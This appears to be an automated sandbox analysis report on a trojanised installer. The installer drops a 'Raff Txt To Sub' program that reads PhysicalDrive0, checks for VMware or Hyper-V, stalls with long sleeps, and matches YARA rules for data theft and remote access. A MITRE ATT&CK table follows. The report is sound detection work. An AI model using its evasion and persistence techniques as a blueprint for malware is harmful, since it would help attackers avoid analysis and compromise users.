        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpFile created: C:\Users\user\AppData\Local\Raff Txt To Sub\is-J2GOF.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpFile created: C:\Users\user\AppData\Local\Raff Txt To Sub\libgdk_pixbuf-2.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpFile created: C:\Users\user\AppData\Local\Raff Txt To Sub\libgdkmm-2.4-1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exeFile created: C:\ProgramData\Eurofighter Typhoon Game 10.8.45\Eurofighter Typhoon Game 10.8.45.exeJump to dropped file

        Boot Survival

        barindex
        Source: C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive02_2_00401A4F
        Source: C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive02_2_02D9F7D6
        Source: C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exeCode function: 2_2_0040B34A StartServiceCtrlDispatcherA,2_2_0040B34A
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpCode function: 1_2_00423B84 IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,1_2_00423B84
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpCode function: 1_2_00423B84 IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,1_2_00423B84
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpCode function: 1_2_00424154 IsIconic,SetActiveWindow,SetFocus,1_2_00424154
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpCode function: 1_2_0042410C IsIconic,SetActiveWindow,1_2_0042410C
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpCode function: 1_2_004182FC IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,1_2_004182FC
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpCode function: 1_2_00478558 IsIconic,GetWindowLongA,ShowWindow,ShowWindow,1_2_00478558
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpCode function: 1_2_004227D4 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,1_2_004227D4
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpCode function: 1_2_00417510 IsIconic,GetCapture,1_2_00417510
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpCode function: 1_2_00417C46 IsIconic,SetWindowPos,1_2_00417C46
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpCode function: 1_2_00417C48 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,1_2_00417C48
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpCode function: 1_2_0044A684 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_0044A684
        Source: C:\Users\user\Desktop\JtDj8LXROa.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exeCode function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary,2_2_00401B4B
        Source: C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exeCode function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary,2_2_02D9F8DA
        Source: C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exeWindow / User API: threadDelayed 5305Jump to behavior
        Source: C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exeWindow / User API: threadDelayed 4553Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-IEO87.tmp\_isetup\_RegDLL.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Raff Txt To Sub\libgobject-2.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Raff Txt To Sub\libglibmm-2.4-1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Raff Txt To Sub\libgcc_s_dw2-1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Raff Txt To Sub\libintl-8.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Raff Txt To Sub\libgraphite2.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Raff Txt To Sub\libgmodule-2.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Raff Txt To Sub\is-3E0BT.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Raff Txt To Sub\is-OINQS.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Raff Txt To Sub\is-T9B97.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-IEO87.tmp\_isetup\_setup64.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Raff Txt To Sub\is-S3DSP.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Raff Txt To Sub\libpangocairo-1.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Raff Txt To Sub\libpangowin32-1.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Raff Txt To Sub\is-8S82H.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Raff Txt To Sub\libtiff-5.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Raff Txt To Sub\is-QL93H.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Raff Txt To Sub\liblzma-5.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Raff Txt To Sub\libjpeg-8.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Raff Txt To Sub\is-JLHGP.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Raff Txt To Sub\is-0GII4.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Raff Txt To Sub\libharfbuzz-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Raff Txt To Sub\is-4PF6P.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Raff Txt To Sub\is-TITH4.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Raff Txt To Sub\is-E99MS.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Raff Txt To Sub\libpangomm-1.4-1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Raff Txt To Sub\libgdk-win32-2.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Raff Txt To Sub\is-RT5D9.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Raff Txt To Sub\libpcre-1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-IEO87.tmp\_isetup\_iscrypt.dllJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Raff Txt To Sub\is-MIIEA.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Raff Txt To Sub\librsvg-2-2.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Raff Txt To Sub\uninstall\unins000.exe (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Raff Txt To Sub\is-45KG3.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Raff Txt To Sub\libpangoft2-1.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Raff Txt To Sub\is-U6VV1.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Raff Txt To Sub\is-FNN9L.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Raff Txt To Sub\is-KVJ9F.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Raff Txt To Sub\is-UDOMJ.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Raff Txt To Sub\libpixman-1-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Raff Txt To Sub\libpango-1.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Raff Txt To Sub\is-HL3OV.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Raff Txt To Sub\zlib1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Raff Txt To Sub\is-F583D.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Raff Txt To Sub\libsigc-2.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Raff Txt To Sub\libwinpthread-1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Raff Txt To Sub\uninstall\is-APE3N.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Raff Txt To Sub\libgomp-1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Raff Txt To Sub\is-RD9OC.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Raff Txt To Sub\is-4D90I.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Raff Txt To Sub\is-R0B0H.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Raff Txt To Sub\is-044SQ.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Raff Txt To Sub\libpng16-16.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-IEO87.tmp\_isetup\_shfoldr.dllJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Raff Txt To Sub\is-QREK9.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Raff Txt To Sub\liblcms2-2.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Raff Txt To Sub\is-4931H.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Raff Txt To Sub\is-J2GOF.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Raff Txt To Sub\libgdk_pixbuf-2.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Raff Txt To Sub\libgdkmm-2.4-1.dll (copy)Jump to dropped file
        Source: C:\Users\user\Desktop\JtDj8LXROa.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_0-5781
        Source: C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_2-17956
        Source: C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exe TID: 7588Thread sleep count: 5305 > 30Jump to behavior
        Source: C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exe TID: 7588Thread sleep time: -10610000s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exe TID: 8076Thread sleep count: 67 > 30Jump to behavior
        Source: C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exe TID: 8076Thread sleep time: -4020000s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exe TID: 7588Thread sleep count: 4553 > 30Jump to behavior
        Source: C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exe TID: 7588Thread sleep time: -9106000s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exeFile opened: PhysicalDrive0Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpCode function: 1_2_0046CA58 FindFirstFileA,FindNextFileA,FindClose,1_2_0046CA58
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpCode function: 1_2_00450A2C FindFirstFileA,GetLastError,1_2_00450A2C
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpCode function: 1_2_00474EB4 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,1_2_00474EB4
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpCode function: 1_2_0045E01C SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_0045E01C
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpCode function: 1_2_0045CB7C FindFirstFileA,FindNextFileA,FindClose,1_2_0045CB7C
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpCode function: 1_2_00473164 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,1_2_00473164
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpCode function: 1_2_0048B510 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,1_2_0048B510
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpCode function: 1_2_0045DC88 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_0045DC88
        Source: C:\Users\user\Desktop\JtDj8LXROa.exeCode function: 0_2_004096E0 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery,0_2_004096E0
        Source: C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exeThread delayed: delay time: 60000Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpFile opened: C:\Users\user\AppData\RoamingJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpFile opened: C:\Users\userJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpFile opened: C:\Users\user\AppDataJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
        Source: is-3J7FL.tmp, 00000001.00000002.2985152205.00000000007BC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
        Source: txttosub32_64.exe, 00000002.00000002.2985433217.0000000000B6E000.00000004.00000020.00020000.00000000.sdmp, txttosub32_64.exe, 00000002.00000002.2985433217.0000000000B68000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: txttosub32_64.exe, 00000002.00000002.2985433217.0000000000A78000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(
        Source: C:\Users\user\Desktop\JtDj8LXROa.exeAPI call chain: ExitProcess graph end nodegraph_0-6521
        Source: C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exeAPI call chain: ExitProcess graph end nodegraph_2-17957
        Source: C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exeAPI call chain: ExitProcess graph end nodegraph_2-17684
        Source: C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exeCode function: 2_2_02DB00FE RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,2_2_02DB00FE
        Source: C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exeCode function: 2_2_02DB00FE RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,2_2_02DB00FE
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpCode function: 1_2_00447880 LoadLibraryA,GetProcAddress,1_2_00447880
        Source: C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exeCode function: 2_2_02D9648B RtlInitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetTickCount,GetVersionExA,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_malloc,_malloc,_malloc,QueryPerformanceCounter,Sleep,_malloc,_malloc,Sleep,RtlEnterCriticalSection,RtlLeaveCriticalSection,2_2_02D9648B
        Source: C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exeCode function: 2_2_02DA9468 SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_02DA9468
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpCode function: 1_2_0045950C GetVersion,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,AllocateAndInitializeSid,LocalFree,1_2_0045950C
        Source: C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exeCode function: 2_2_02D9F78E cpuid 2_2_02D9F78E
        Source: C:\Users\user\Desktop\JtDj8LXROa.exeCode function: GetLocaleInfoA,0_2_00405154
        Source: C:\Users\user\Desktop\JtDj8LXROa.exeCode function: GetLocaleInfoA,0_2_004051A0
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpCode function: GetLocaleInfoA,1_2_004084EC
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpCode function: GetLocaleInfoA,1_2_00408538
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpCode function: 1_2_004559D8 GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeA,GetLastError,CreateFileA,SetNamedPipeHandleState,CreateProcessA,CloseHandle,CloseHandle,1_2_004559D8
        Source: C:\Users\user\Desktop\JtDj8LXROa.exeCode function: 0_2_004026C4 GetSystemTime,0_2_004026C4
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpCode function: 1_2_00453230 GetUserNameA,1_2_00453230
        Source: C:\Users\user\Desktop\JtDj8LXROa.exeCode function: 0_2_00405C3C GetVersionExA,0_2_00405C3C

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: 00000002.00000002.2987018343.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.2986892779.0000000002CE3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: txttosub32_64.exe PID: 7584, type: MEMORYSTR

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: 00000002.00000002.2987018343.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.2986892779.0000000002CE3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: txttosub32_64.exe PID: 7584, type: MEMORYSTR
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts3
        Native API
        1
        DLL Side-Loading
        1
        DLL Side-Loading
        1
        Deobfuscate/Decode Files or Information
        OS Credential Dumping1
        System Time Discovery
        Remote Services1
        Archive Collected Data
        2
        Ingress Tool Transfer
        Exfiltration Over Other Network Medium1
        System Shutdown/Reboot
        CredentialsDomainsDefault Accounts2
        Service Execution
        4
        Windows Service
        1
        Access Token Manipulation
        3
        Obfuscated Files or Information
        LSASS Memory1
        Account Discovery
        Remote Desktop ProtocolData from Removable Media2
        Encrypted Channel
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAt1
        Bootkit
        4
        Windows Service
        22
        Software Packing
        Security Account Manager3
        File and Directory Discovery
        SMB/Windows Admin SharesData from Network Shared Drive1
        Non-Standard Port
